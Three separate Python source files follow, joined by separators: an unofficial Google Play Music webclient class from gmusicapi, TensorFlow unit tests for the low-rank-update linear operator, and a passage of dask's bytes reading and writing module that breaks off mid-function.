from gmusicapi.protocol import webclient
from gmusicapi.utils import utils
import gmusicapi.session
class Webclient(_Base):
"""Allows library management and streaming by posing as the
music.google.com webclient.
Uploading is not supported by this client (use the :class:`Musicmanager`
to upload).
Any methods in this class that are duplicated by
the :class:`Mobileclient` are deprecated, and will generate a
warning at runtime.
The following methods are *not* deprecated:
* :func:`create_playlist`
* :func:`get_registered_devices`
* :func:`get_shared_playlist_info`
* :func:`get_song_download_info`
* :func:`get_stream_urls`
* :func:`get_stream_audio`
* :func:`report_incorrect_match`
* :func:`upload_album_art`
"""
_session_class = gmusicapi.session.Webclient
def __init__(self, debug_logging=True, validate=True, verify_ssl=True):
super(Webclient, self).__init__(self.__class__.__name__,
debug_logging,
validate,
verify_ssl)
def login(self, email, password):
"""Authenticates the webclient.
Returns ``True`` on success, ``False`` on failure.
:param email: eg ``'test@gmail.com'`` or just ``'test'``.
:param password: password or app-specific password for 2-factor users.
This is not stored locally, and is sent securely over SSL.
Users who don't use two-factor auth will likely need to enable
`less secure login <https://www.google.com/settings/security/lesssecureapps>`__.
If this is needed, a warning will be logged during login (which will print to stderr
in the default logging configuration).
Users of two-factor authentication will need to set an application-specific password
to log in.
"""
if not self.session.login(email, password):
self.logger.info("failed to authenticate")
return False
self.logger.info("authenticated")
return True
def logout(self):
return super(Webclient, self).logout()
def create_playlist(self, name, description=None, public=False):
"""
Creates a playlist and returns its id.
:param name: the name of the playlist.
:param description: (optional) the description of the playlist.
:param public: if True and the user has All Access, create a shared playlist.
"""
res = self._make_call(webclient.CreatePlaylist, name, description, public)
return res[1][0]
def get_shared_playlist_info(self, share_token):
"""
Returns a dictionary with four keys: author, description, num_tracks, and title.
:param share_token: from ``playlist['shareToken']``, or a playlist share
url (``https://play.google.com/music/playlist/<token>``).
Note that tokens from urls will need to be url-decoded,
eg ``AM...%3D%3D`` becomes ``AM...==``.
"""
res = self._make_call(webclient.GetSharedPlaylist, '', share_token)
num_tracks = len(res[1][0])
md = res[1][1]
return {
u'author': md[8],
u'description': md[7],
u'num_tracks': num_tracks,
u'title': md[1],
}
def get_registered_devices(self):
"""
Returns a list of dictionaries representing devices associated with the account.
Performing the :class:`Musicmanager` OAuth flow will register a device
of type ``'DESKTOP_APP'``.
Installing the Android Google Music app and logging into it will
register a device of type ``'PHONE'``, which is required for streaming with
the :class:`Mobileclient`.
Here is an example response::
[
{
u'date': 1367470393588, # utc-millisecond
u'id': u'AA:BB:CC:11:22:33',
u'lastUsedMs': 1394138679694,
u'name': u'my-hostname',
u'type': u'DESKTOP_APP'
},
{
u'carrier': u'Google',
u'date': 1344808742774,
u'id': u'0x00112233aabbccdd', # remove 0x when streaming
u'manufacturer': u'Asus',
u'model': u'Nexus 7',
u'name': u'',
u'type': u'PHONE'
},
{
u'date': 1394133624308,
u'id': u'ios:01234567-0123-0123-0123-0123456789AB',
u'lastUsedMs': 1394138679694,
u'type': u'IOS'
}
]
"""
# TODO sessionid stuff
res = self._make_call(webclient.GetSettings, '')
return res['settings']['devices']
@utils.enforce_id_param
def get_song_download_info(self, song_id):
"""Returns a tuple: ``('<url>', <download count>)``.
:param song_id: a single song id.
``url`` will be ``None`` if the download limit is exceeded.
GM allows 2 downloads per song. The download count may not always be accurate,
and the 2 download limit seems to be loosely enforced.
This call alone does not count towards a download -
the count is incremented when ``url`` is retrieved.
"""
# TODO the protocol expects a list of songs - could extend with accept_singleton
info = self._make_call(webclient.GetDownloadInfo, [song_id])
url = info.get('url')
return (url, info["downloadCounts"][song_id])
@utils.enforce_id_param
def get_stream_urls(self, song_id):
"""Returns a list of urls that point to a streamable version of this song.
If you just need the audio and are ok with gmusicapi doing the download,
consider using :func:`get_stream_audio` instead.
This abstracts away the differences between different kinds of tracks:
* normal tracks return a single url
* All Access tracks return multiple urls, which must be combined
:param song_id: a single song id.
While acquiring the urls requires authentication, retreiving the
contents does not.
However, there are limitations on how the stream urls can be used:
* the urls expire after a minute
* only one IP can be streaming music at once.
Other attempts will get an http 403 with
``X-Rejected-Reason: ANOTHER_STREAM_BEING_PLAYED``.
*This is only intended for streaming*. The streamed audio does not contain metadata.
Use :func:`get_song_download_info` or :func:`Musicmanager.download_song
<gmusicapi.clients.Musicmanager.download_song>`
to download files with metadata.
"""
res = self._make_call(webclient.GetStreamUrl, song_id)
try:
return [res['url']]
except KeyError:
return res['urls']
@utils.enforce_id_param
def get_stream_audio(self, song_id, use_range_header=None):
"""Returns a bytestring containing mp3 audio for this song.
:param song_id: a single song id
:param use_range_header: in some cases, an HTTP range header can be
used to save some bandwidth.
However, there's no guarantee that the server will respect it,
meaning that the client may get back an unexpected response when
using it.
There are three possible values for this argument:
* None: (default) send header; fix response locally on problems
* True: send header; raise IOError on problems
* False: do not send header
"""
urls = self.get_stream_urls(song_id)
# TODO shouldn't session.send be used throughout?
if len(urls) == 1:
return self.session._rsession.get(urls[0]).content
# AA tracks are separated into multiple files.
# the url contains the range of each file to be used.
range_pairs = [[int(s) for s in val.split('-')]
for url in urls
for key, val in parse_qsl(urlparse(url)[4])
if key == 'range']
stream_pieces = []
prev_end = 0
headers = None
for url, (start, end) in zip(urls, range_pairs):
if use_range_header or use_range_header is None:
headers = {'Range': 'bytes=' + str(prev_end - start) + '-'}
audio = self.session._rsession.get(url, headers=headers).content
if end - prev_end != len(audio) - 1:
# content length is not in the right range
if use_range_header:
# the user didn't want automatic response fixup
raise IOError('use_range_header is True but the response'
' was not the correct content length.'
' This might be caused by a (poorly-written) http proxy.')
# trim to the proper range
audio = audio[prev_end - start:]
stream_pieces.append(audio)
prev_end = end + 1
return ''.join(stream_pieces)
@utils.accept_singleton(basestring)
@utils.enforce_ids_param
@utils.empty_arg_shortcircuit
def report_incorrect_match(self, song_ids):
"""Equivalent to the 'Fix Incorrect Match' button, this requests re-uploading of songs.
Returns the song_ids provided.
:param song_ids: a list of song ids to report, or a single song id.
Note that if you uploaded a song through gmusicapi, it won't be reuploaded
automatically - this currently only works for songs uploaded with the Music Manager.
See issue `#89 <https://github.com/simon-weber/Unofficial-Google-Music-API/issues/89>`__.
This should only be used on matched tracks (``song['type'] == 6``).
"""
self._make_call(webclient.ReportBadSongMatch, song_ids)
return song_ids
@utils.accept_singleton(basestring)
@utils.enforce_ids_param
@utils.empty_arg_shortcircuit
def upload_album_art(self, song_ids, image_filepath):
"""Uploads an image and sets it as the album art for songs.
Returns a url to the image on Google's servers.
:param song_ids: a list of song ids, or a single song id.
:param image_filepath: filepath of the art to use. jpg and png are known to work.
This function will *always* upload the provided image, even if it's already uploaded.
If the art is already uploaded and set for another song, copy over the
value of the ``'albumArtUrl'`` key using :func:`Mobileclient.change_song_metadata` instead.
"""
res = self._make_call(webclient.UploadImage, image_filepath)
url = res['imageUrl']
song_dicts = [dict((('id', id), ('albumArtUrl', url))) for id in song_ids]
self._make_call(webclient.ChangeSongMetadata, song_dicts)
return url
# deprecated methods follow:
@utils.accept_singleton(basestring)
@utils.enforce_ids_param
@utils.empty_arg_shortcircuit
@utils.deprecated('prefer Mobileclient.delete_songs')
def delete_songs(self, song_ids):
"""**Deprecated**: prefer :func:`Mobileclient.delete_songs`.
Deletes songs from the entire library. Returns a list of deleted song ids.
:param song_ids: a list of song ids, or a single song id.
"""
res = self._make_call(webclient.DeleteSongs, song_ids)
return res['deleteIds']
@utils.accept_singleton(basestring, 2)
@utils.enforce_ids_param(2)
@utils.enforce_id_param
@utils.empty_arg_shortcircuit(position=2)
@utils.deprecated('prefer Mobileclient.add_songs_to_playlist')
def add_songs_to_playlist(self, playlist_id, song_ids):
"""**Deprecated**: prefer :func:`Mobileclient.add_songs_to_playlist`.
Appends songs to a playlist.
Returns a list of (song id, playlistEntryId) tuples that were added.
:param playlist_id: id of the playlist to add to.
:param song_ids: a list of song ids, or a single song id.
Playlists have a maximum size of 1000 songs.
"""
res = self._make_call(webclient.AddToPlaylist, playlist_id, song_ids)
new_entries = res['songIds']
return [(e['songId'], e['playlistEntryId']) for e in new_entries]
@utils.accept_singleton(basestring, 2)
@utils.enforce_ids_param(2)
@utils.enforce_id_param
@utils.empty_arg_shortcircuit(position=2)
@utils.deprecated('prefer Mobileclient.remove_entries_from_playlist')
def remove_songs_from_playlist(self, playlist_id, sids_to_match):
"""**Deprecated**: prefer :func:`Mobileclient.remove_entries_from_playlist`.
Removes all copies of the given song ids from a playlist.
Returns a list of removed (sid, eid) pairs.
:param playlist_id: id of the playlist to remove songs from.
:param sids_to_match: a list of song ids to match, or a single song id.
This does *not always* the inverse of a call to :func:`add_songs_to_playlist`,
since multiple copies of the same song are removed.
"""
playlist_tracks = self.get_playlist_songs(playlist_id)
sid_set = set(sids_to_match)
matching_eids = [t["playlistEntryId"]
for t in playlist_tracks
if t["id"] in sid_set]
if matching_eids:
# Call returns "sid_eid" strings.
sid_eids = self._remove_entries_from_playlist(playlist_id,
matching_eids)
return [s.split("_") for s in sid_eids]
else:
return []
@utils.accept_singleton(basestring, 2)
@utils.empty_arg_shortcircuit(position=2)
def _remove_entries_from_playlist(self, playlist_id, entry_ids_to_remove):
"""Removes entries from a playlist. Returns a list of removed "sid_eid" strings.
:param playlist_id: the playlist to be modified.
:param entry_ids: a list of entry ids, or a single entry id.
"""
# GM requires the song ids in the call as well; find them.
playlist_tracks = self.get_playlist_songs(playlist_id)
remove_eid_set = set(entry_ids_to_remove)
e_s_id_pairs = [(t["id"], t["playlistEntryId"])
for t in playlist_tracks
if t["playlistEntryId"] in remove_eid_set]
num_not_found = len(entry_ids_to_remove) - len(e_s_id_pairs)
if num_not_found > 0:
self.logger.warning("when removing, %d entry ids could not be found in playlist id %s",
num_not_found, playlist_id)
# Unzip the pairs.
sids, eids = zip(*e_s_id_pairs)
res = self._make_call(webclient.DeleteSongs, sids, playlist_id, eids)
return res['deleteIds']
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables as variables_module
from tensorflow.python.ops.linalg import linalg as linalg_lib
from tensorflow.python.ops.linalg import linear_operator_test_util
from tensorflow.python.platform import test
linalg = linalg_lib
rng = np.random.RandomState(0)
class BaseLinearOperatorLowRankUpdatetest(object):
"""Base test for this type of operator."""
# Subclasses should set these attributes to either True or False.
# If True, A = L + UDV^H
# If False, A = L + UV^H or A = L + UU^H, depending on _use_v.
_use_diag_update = None
# If True, diag is > 0, which means D is symmetric positive definite.
_is_diag_update_positive = None
# If True, A = L + UDV^H
# If False, A = L + UDU^H or A = L + UU^H, depending on _use_diag_update
_use_v = None
@staticmethod
def operator_shapes_infos():
shape_info = linear_operator_test_util.OperatorShapesInfo
# Previously we had a (2, 10, 10) shape at the end. We did this to test the
# inversion and determinant lemmas on not-tiny matrices, since these are
# known to have stability issues. This resulted in test timeouts, so this
# shape has been removed, but rest assured, the tests did pass.
return [
shape_info((0, 0)),
shape_info((1, 1)),
shape_info((1, 3, 3)),
shape_info((3, 4, 4)),
shape_info((2, 1, 4, 4))]
def _gen_positive_diag(self, dtype, diag_shape):
if dtype.is_complex:
diag = linear_operator_test_util.random_uniform(
diag_shape, minval=1e-4, maxval=1., dtype=dtypes.float32)
return math_ops.cast(diag, dtype=dtype)
return linear_operator_test_util.random_uniform(
diag_shape, minval=1e-4, maxval=1., dtype=dtype)
def operator_and_matrix(self, shape_info, dtype, use_placeholder,
ensure_self_adjoint_and_pd=False):
# Recall A = L + UDV^H
shape = list(shape_info.shape)
diag_shape = shape[:-1]
k = shape[-2] // 2 + 1
u_perturbation_shape = shape[:-1] + [k]
diag_update_shape = shape[:-2] + [k]
# base_operator L will be a symmetric positive definite diagonal linear
# operator, with condition number as high as 1e4.
base_diag = self._gen_positive_diag(dtype, diag_shape)
lin_op_base_diag = base_diag
# U
u = linear_operator_test_util.random_normal_correlated_columns(
u_perturbation_shape, dtype=dtype)
lin_op_u = u
# V
v = linear_operator_test_util.random_normal_correlated_columns(
u_perturbation_shape, dtype=dtype)
lin_op_v = v
# D
if self._is_diag_update_positive or ensure_self_adjoint_and_pd:
diag_update = self._gen_positive_diag(dtype, diag_update_shape)
else:
diag_update = linear_operator_test_util.random_normal(
diag_update_shape, stddev=1e-4, dtype=dtype)
lin_op_diag_update = diag_update
if use_placeholder:
lin_op_base_diag = array_ops.placeholder_with_default(
base_diag, shape=None)
lin_op_u = array_ops.placeholder_with_default(u, shape=None)
lin_op_v = array_ops.placeholder_with_default(v, shape=None)
lin_op_diag_update = array_ops.placeholder_with_default(
diag_update, shape=None)
base_operator = linalg.LinearOperatorDiag(
lin_op_base_diag,
is_positive_definite=True,
is_self_adjoint=True)
operator = linalg.LinearOperatorLowRankUpdate(
base_operator,
lin_op_u,
v=lin_op_v if self._use_v else None,
diag_update=lin_op_diag_update if self._use_diag_update else None,
is_diag_update_positive=self._is_diag_update_positive)
# The matrix representing L
base_diag_mat = array_ops.matrix_diag(base_diag)
# The matrix representing D
diag_update_mat = array_ops.matrix_diag(diag_update)
# Set up mat as some variant of A = L + UDV^H
if self._use_v and self._use_diag_update:
# In this case, we have L + UDV^H and it isn't symmetric.
expect_use_cholesky = False
matrix = base_diag_mat + math_ops.matmul(
u, math_ops.matmul(diag_update_mat, v, adjoint_b=True))
elif self._use_v:
# In this case, we have L + UDV^H and it isn't symmetric.
expect_use_cholesky = False
matrix = base_diag_mat + math_ops.matmul(u, v, adjoint_b=True)
elif self._use_diag_update:
# In this case, we have L + UDU^H, which is PD if D > 0, since L > 0.
expect_use_cholesky = self._is_diag_update_positive
matrix = base_diag_mat + math_ops.matmul(
u, math_ops.matmul(diag_update_mat, u, adjoint_b=True))
else:
# In this case, we have L + UU^H, which is PD since L > 0.
expect_use_cholesky = True
matrix = base_diag_mat + math_ops.matmul(u, u, adjoint_b=True)
if expect_use_cholesky:
self.assertTrue(operator._use_cholesky)
else:
self.assertFalse(operator._use_cholesky)
return operator, matrix
def test_tape_safe(self):
base_operator = linalg.LinearOperatorDiag(
variables_module.Variable([1.], name="diag"),
is_positive_definite=True,
is_self_adjoint=True)
operator = linalg.LinearOperatorLowRankUpdate(
base_operator,
u=variables_module.Variable([[2.]], name="u"),
v=variables_module.Variable([[1.25]], name="v")
if self._use_v else None,
diag_update=variables_module.Variable([1.25], name="diag_update")
if self._use_diag_update else None,
is_diag_update_positive=self._is_diag_update_positive)
self.check_tape_safe(operator)
class LinearOperatorLowRankUpdatetestWithDiagUseCholesky(
BaseLinearOperatorLowRankUpdatetest,
linear_operator_test_util.SquareLinearOperatorDerivedClassTest):
"""A = L + UDU^H, D > 0, L > 0 ==> A > 0 and we can use a Cholesky."""
_use_diag_update = True
_is_diag_update_positive = True
_use_v = False
def setUp(self):
# Decrease tolerance since we are testing with condition numbers as high as
# 1e4.
self._atol[dtypes.float32] = 1e-5
self._rtol[dtypes.float32] = 1e-5
self._atol[dtypes.float64] = 1e-10
self._rtol[dtypes.float64] = 1e-10
self._rtol[dtypes.complex64] = 1e-4
class LinearOperatorLowRankUpdatetestWithDiagCannotUseCholesky(
BaseLinearOperatorLowRankUpdatetest,
linear_operator_test_util.SquareLinearOperatorDerivedClassTest):
"""A = L + UDU^H, D !> 0, L > 0 ==> A !> 0 and we cannot use a Cholesky."""
@staticmethod
def skip_these_tests():
return ["cholesky", "eigvalsh"]
_use_diag_update = True
_is_diag_update_positive = False
_use_v = False
def setUp(self):
# Decrease tolerance since we are testing with condition numbers as high as
# 1e4. This class does not use Cholesky, and thus needs even looser
# tolerance.
self._atol[dtypes.float32] = 1e-4
self._rtol[dtypes.float32] = 1e-4
self._atol[dtypes.float64] = 1e-9
self._rtol[dtypes.float64] = 1e-9
self._rtol[dtypes.complex64] = 2e-4
class LinearOperatorLowRankUpdatetestNoDiagUseCholesky(
BaseLinearOperatorLowRankUpdatetest,
linear_operator_test_util.SquareLinearOperatorDerivedClassTest):
"""A = L + UU^H, L > 0 ==> A > 0 and we can use a Cholesky."""
_use_diag_update = False
_is_diag_update_positive = None
_use_v = False
def setUp(self):
# Decrease tolerance since we are testing with condition numbers as high as
# 1e4.
self._atol[dtypes.float32] = 1e-5
self._rtol[dtypes.float32] = 1e-5
self._atol[dtypes.float64] = 1e-10
self._rtol[dtypes.float64] = 1e-10
self._rtol[dtypes.complex64] = 1e-4
class LinearOperatorLowRankUpdatetestNoDiagCannotUseCholesky(
BaseLinearOperatorLowRankUpdatetest,
linear_operator_test_util.SquareLinearOperatorDerivedClassTest):
"""A = L + UV^H, L > 0 ==> A is not symmetric and we cannot use a Cholesky."""
@staticmethod
def skip_these_tests():
return ["cholesky", "eigvalsh"]
_use_diag_update = False
_is_diag_update_positive = None
_use_v = True
def setUp(self):
# Decrease tolerance since we are testing with condition numbers as high as
# 1e4. This class does not use Cholesky, and thus needs even looser
# tolerance.
self._atol[dtypes.float32] = 1e-4
self._rtol[dtypes.float32] = 1e-4
self._atol[dtypes.float64] = 1e-9
self._rtol[dtypes.float64] = 1e-9
self._atol[dtypes.complex64] = 1e-5
self._rtol[dtypes.complex64] = 2e-4
class LinearOperatorLowRankUpdatetestWithDiagNotSquare(
BaseLinearOperatorLowRankUpdatetest,
linear_operator_test_util.NonSquareLinearOperatorDerivedClassTest):
"""A = L + UDU^H, D > 0, L > 0 ==> A > 0 and we can use a Cholesky."""
_use_diag_update = True
_is_diag_update_positive = True
_use_v = True
class LinearOperatorLowRankUpdateBroadcastsShape(test.TestCase):
"""Test that the operator's shape is the broadcast of arguments."""
def test_static_shape_broadcasts_up_from_operator_to_other_args(self):
base_operator = linalg.LinearOperatorIdentity(num_rows=3)
u = array_ops.ones(shape=[2, 3, 2])
diag = array_ops.ones(shape=[2, 2])
operator = linalg.LinearOperatorLowRankUpdate(base_operator, u, diag)
# domain_dimension is 3
self.assertAllEqual([2, 3, 3], operator.shape)
self.assertAllEqual([2, 3, 3], self.evaluate(operator.to_dense()).shape)
@test_util.run_deprecated_v1
def test_dynamic_shape_broadcasts_up_from_operator_to_other_args(self):
num_rows_ph = array_ops.placeholder(dtypes.int32)
base_operator = linalg.LinearOperatorIdentity(num_rows=num_rows_ph)
u_shape_ph = array_ops.placeholder(dtypes.int32)
u = array_ops.ones(shape=u_shape_ph)
operator = linalg.LinearOperatorLowRankUpdate(base_operator, u)
feed_dict = {
num_rows_ph: 3,
u_shape_ph: [2, 3, 2], # batch_shape = [2]
}
with self.cached_session():
shape_tensor = operator.shape_tensor().eval(feed_dict=feed_dict)
self.assertAllEqual([2, 3, 3], shape_tensor)
dense = operator.to_dense().eval(feed_dict=feed_dict)
self.assertAllEqual([2, 3, 3], dense.shape)
def test_u_and_v_incompatible_batch_shape_raises(self):
base_operator = linalg.LinearOperatorIdentity(num_rows=3, dtype=np.float64)
u = rng.rand(5, 3, 2)
v = rng.rand(4, 3, 2)
with self.assertRaisesRegex(ValueError, "Incompatible shapes"):
linalg.LinearOperatorLowRankUpdate(base_operator, u=u, v=v)
def test_u_and_base_operator_incompatible_batch_shape_raises(self):
base_operator = linalg.LinearOperatorIdentity(
num_rows=3, batch_shape=[4], dtype=np.float64)
u = rng.rand(5, 3, 2)
with self.assertRaisesRegex(ValueError, "Incompatible shapes"):
linalg.LinearOperatorLowRankUpdate(base_operator, u=u)
def test_u_and_base_operator_incompatible_domain_dimension(self):
base_operator = linalg.LinearOperatorIdentity(num_rows=3, dtype=np.float64)
u = rng.rand(5, 4, 2)
with self.assertRaisesRegex(ValueError, "not compatible"):
linalg.LinearOperatorLowRankUpdate(base_operator, u=u)
def test_u_and_diag_incompatible_low_rank_raises(self):
base_operator = linalg.LinearOperatorIdentity(num_rows=3, dtype=np.float64)
u = rng.rand(5, 3, 2)
diag = rng.rand(5, 4) # Last dimension should be 2
with self.assertRaisesRegex(ValueError, "not compatible"):
linalg.LinearOperatorLowRankUpdate(base_operator, u=u, diag_update=diag)
def test_diag_incompatible_batch_shape_raises(self):
base_operator = linalg.LinearOperatorIdentity(num_rows=3, dtype=np.float64)
u = rng.rand(5, 3, 2)
diag = rng.rand(4, 2) # First dimension should be 5
with self.assertRaisesRegex(ValueError, "Incompatible shapes"):
linalg.LinearOperatorLowRankUpdate(base_operator, u=u, diag_update=diag)
if __name__ == "__main__":
linear_operator_test_util.add_tests(
LinearOperatorLowRankUpdatetestWithDiagUseCholesky)
linear_operator_test_util.add_tests(
LinearOperatorLowRankUpdatetestWithDiagCannotUseCholesky)
linear_operator_test_util.add_tests(
LinearOperatorLowRankUpdatetestNoDiagUseCholesky)
linear_operator_test_util.add_tests(
LinearOperatorLowRankUpdatetestNoDiagCannotUseCholesky)
linear_operator_test_util.add_tests(
LinearOperatorLowRankUpdatetestWithDiagNotSquare)
test.main()
| |
from __future__ import print_function, division, absolute_import
import io
import os
from toolz import merge
from warnings import warn
from .compression import seekable_files, files as compress_files
from .utils import SeekableFile
from ..compatibility import PY2, unicode
from ..base import tokenize
from ..delayed import delayed, Delayed, apply
from ..utils import (infer_storage_options, system_encoding,
build_name_function, infer_compression,
import_required)
delayed = delayed(pure=True)
# Global registration dictionaries for backend storage functions
# See docstrings to functions below for more information
_read_bytes = dict()
_open_files_write = dict()
_open_files = dict()
_open_text_files = dict()
def write_block_to_file(data, f, compression, encoding):
"""
Parameters
----------
data : data to write
Either str/bytes, or iterable producing those, or something file-like
which can be read.
f : file-like
backend-dependent file-like object
compression : string
a key of `compress_files`
encoding : string (None)
if a string (e.g., 'ascii', 'utf8'), implies text mode, otherwise no
encoding and binary mode.
"""
original = False
f2 = f
f = SeekableFile(f)
if compression:
original = True
f = compress_files[compression](f, mode='wb')
try:
if isinstance(data, (str, bytes)):
if encoding:
f.write(data.encode(encoding=encoding))
else:
f.write(data)
elif isinstance(data, io.IOBase):
# file-like
out = '1'
while out:
out = data.read(64*2**10)
if encoding:
f.write(out.encode(encoding=encoding))
else:
f.write(out)
else:
# iterable, e.g., bag contents
start = False
for d in data:
if start:
f.write(b'\n')
else:
start = True
if encoding:
f.write(d.encode(encoding=encoding))
else:
f.write(d)
finally:
f.close()
if original:
f2.close()
def write_bytes(data, urlpath, name_function=None, compression=None,
encoding=None, **kwargs):
"""For a list of values which evaluate to byte, produce delayed values
which, when executed, result in writing to files.
The path maybe a concrete directory, in which case it is interpreted
as a directory, or a template for numbered output.
The path may be preceded by a protocol, like ``s3://`` or ``hdfs://`` if
those libraries are installed.
Parameters
----------
data: list of ``dask.Delayed`` objects or dask collection
the data to be written
urlpath: string
Absolute or relative filepaths, URLs (may include protocols like
``s3://``); may be globstring (include `*`).
name_function: function or None
If using a globstring, this provides the conversion from part number
to test to replace `*` with.
compression: string or None
String like 'gzip' or 'xz'. Must support efficient random access.
**kwargs: dict
Extra options that make sense to a particular storage connection, e.g.
host, port, username, password, etc.
Examples
--------
>>> values = write_bytes(vals, 's3://bucket/part-*.csv') # doctest: +SKIP
Returns
-------
list of ``dask.Delayed`` objects
"""
if isinstance(urlpath, (tuple, list, set)):
if len(data) != len(urlpath):
raise ValueError('Number of paths and number of delayed objects'
'must match (%s != %s)', len(urlpath), len(data))
storage_options = infer_storage_options(urlpath[0],
inherit_storage_options=kwargs)
del storage_options['path']
paths = [infer_storage_options(u, inherit_storage_options=kwargs)['path']
for u in urlpath]
elif isinstance(urlpath, (str, unicode)):
storage_options = infer_storage_options(urlpath,
inherit_storage_options=kwargs)
path = storage_options.pop('path')
paths = _expand_paths(path, name_function, len(data))
else:
raise ValueError('URL spec must be string or sequence of strings')
if compression == 'infer':
compression = infer_compression(paths[0])
if compression is not None and compression not in compress_files:
raise ValueError("Compression type %s not supported" % compression)
protocol = storage_options.pop('protocol')
ensure_protocol(protocol)
try:
open_files_write = _open_files_write[protocol]
except KeyError:
raise NotImplementedError("Unknown protocol for writing %s (%s)" %
(protocol, urlpath))
keys = ['write-block-%s' % tokenize(d.key, path, storage_options,
compression, encoding) for (d, path) in zip(data, paths)]
return [Delayed(key, dasks=[{key: (write_block_to_file, v.key,
(apply, open_files_write, (p,),
storage_options),
compression, encoding),
}, v.dask])
for key, v, p in zip(keys, data, paths)]
def read_bytes(urlpath, delimiter=None, not_zero=False, blocksize=2**27,
sample=True, compression=None, **kwargs):
""" Convert path to a list of delayed values
The path may be a filename like ``'2015-01-01.csv'`` or a globstring
like ``'2015-*-*.csv'``.
The path may be preceded by a protocol, like ``s3://`` or ``hdfs://`` if
those libraries are installed.
This cleanly breaks data by a delimiter if given, so that block boundaries
start directly after a delimiter and end on the delimiter.
Parameters
----------
urlpath: string
Absolute or relative filepath, URL (may include protocols like
``s3://``), or globstring pointing to data.
delimiter: bytes
An optional delimiter, like ``b'\n'`` on which to split blocks of bytes
not_zero: force seek of start-of-file delimiter, discarding header
blocksize: int (=128MB)
Chunk size
compression: string or None
String like 'gzip' or 'xz'. Must support efficient random access.
sample: bool, int
Whether or not to return a sample from the first 10k bytes
**kwargs: dict
Extra options that make sense to a particular storage connection, e.g.
host, port, username, password, etc.
Examples
--------
>>> sample, blocks = read_bytes('2015-*-*.csv', delimiter=b'\\n') # doctest: +SKIP
>>> sample, blocks = read_bytes('s3://bucket/2015-*-*.csv', delimiter=b'\\n') # doctest: +SKIP
Returns
-------
10kB sample header and list of ``dask.Delayed`` objects or list of lists of
delayed objects if ``fn`` is a globstring.
"""
if compression is not None and compression not in compress_files:
raise ValueError("Compression type %s not supported" % compression)
storage_options = infer_storage_options(urlpath,
inherit_storage_options=kwargs)
protocol = storage_options.pop('protocol')
ensure_protocol(protocol)
try:
read_bytes = _read_bytes[protocol]
except KeyError:
raise NotImplementedError("Unknown protocol for reading %s (%s)" %
(protocol, urlpath))
return read_bytes(storage_options.pop('path'), delimiter=delimiter,
not_zero=not_zero, blocksize=blocksize, sample=sample,
compression=compression, **storage_options)
def open_files_by(open_files_backend, path, compression=None, **kwargs):
""" Given open files backend and path return dask.delayed file-like objects
NOTE: This is an internal helper function, please refer to
:func:`open_files` documentation for more details.
Parameters
----------
path: string
Filepath or globstring
compression: string
Compression to use. See ``dask.bytes.compression.files`` for options.
**kwargs: dict
Extra options that make sense to a particular storage connection, e.g.
host, port, username, password, etc.
Returns
-------
List of ``dask.delayed`` objects that compute to file-like objects
"""
files = open_files_backend(path, **kwargs)
if compression:
decompress = merge(seekable_files, compress_files)[compression]
if PY2:
files = [delayed(SeekableFile)(file) for file in files]
files = [delayed(decompress)(file) for file in files]
return files
def open_files(urlpath, compression=None, **kwargs):
""" Given path return dask.delayed file-like objects
Parameters
----------
urlpath: string
Absolute or relative filepath, URL (may include protocols like
``s3://``), or globstring pointing to data.
compression: string
Compression to use. See ``dask.bytes.compression.files`` for options.
**kwargs: dict
Extra options that make sense to a particular storage connection, e.g.
host, port, username, password, etc.
Examples
--------
>>> files = open_files('2015-*-*.csv') # doctest: +SKIP
>>> files = open_files('s3://bucket/2015-*-*.csv.gz', compression='gzip') # doctest: +SKIP
Returns
-------
List of ``dask.delayed`` objects that compute to file-like objects
"""
if compression is not None and compression not in compress_files:
raise ValueError("Compression type %s not supported" % compression)
storage_options = infer_storage_options(urlpath,
inherit_storage_options=kwargs)
protocol = storage_options.pop('protocol')
ensure_protocol(protocol)
try:
open_files_backend = _open_files[protocol]
except KeyError:
raise NotImplementedError("Unknown protocol %s (%s)" %
(protocol, urlpath))
return open_files_by(open_files_backend, storage_options.pop('path'),
compression=compression, **storage_options)
def _expand_paths(path, name_function, num):
if isinstance(path, (str, unicode)):
if path.count('*') > 1:
raise ValueError("Output path spec must contain at most one '*'.")
if name_function is None:
name_function = build_name_function(num - 1)
if '*' not in path:
path = os.path.join(path, '*.part')
formatted_names = [name_function(i) for i in range(num)]
if formatted_names != sorted(formatted_names):
warn("In order to preserve order between partitions "
"name_function must preserve the order of its input")
paths = [path.replace('*', name_function(i))
for i in range(num)]
elif isinstance(path, (tuple, list, set)):
assert len(path) == num
paths = path
else:
raise ValueError("""Path should be either"
1. A list of paths -- ['foo.json', 'bar.json', ...]
2. A directory -- 'foo/
3. A path with a * in it -- 'foo.*.json'""")
return paths
def open_text_files(urlpath, encoding=system_encoding, errors='strict',
compression=None, **kwargs):
""" Given path return dask.delayed file-like objects in text mode
Parameters
----------
urlpath: string
Absolute or relative filepath, URL (may include protocols like
``s3://``), or globstring pointing to data.
encoding: string
errors: string
compression: string
Compression to use. See ``dask.bytes.compression.files`` for options.
**kwargs: dict
Extra options that make sense to a particular storage connection, e.g.
host, port, username, password, etc.
Examples
--------
>>> files = open_text_files('2015-*-*.csv', encoding='utf-8') # doctest: +SKIP
>>> files = open_text_files('s3://bucket/2015-*-*.csv') # doctest: +SKIP
Returns
-------
List of ``dask.delayed`` objects that compute to text file-like objects
"""
if compression is not None and compression not in compress_files:
raise ValueError("Compression type %s not supported" % compression)
storage_options = infer_storage_options(urlpath,
inherit_storage_options=kwargs)
path = storage_options.pop('path')
protocol = storage_options.pop('protocol')
ensure_protocol(protocol)
if protocol in _open_text_files and compression is None:
return _open_text_files[protocol](path,
encoding=encoding,
errors=errors,
**storage_options)
elif protocol in _open_files:
files = open_files_by(_open_files[protocol],
path,
compression=compression,
**storage_options)
if PY2:
files = [delayed(SeekableFile)(file) for file in files]
return [delayed(io.TextIOWrapper)(file, encoding=encoding,
errors=errors) for file in files]
else:
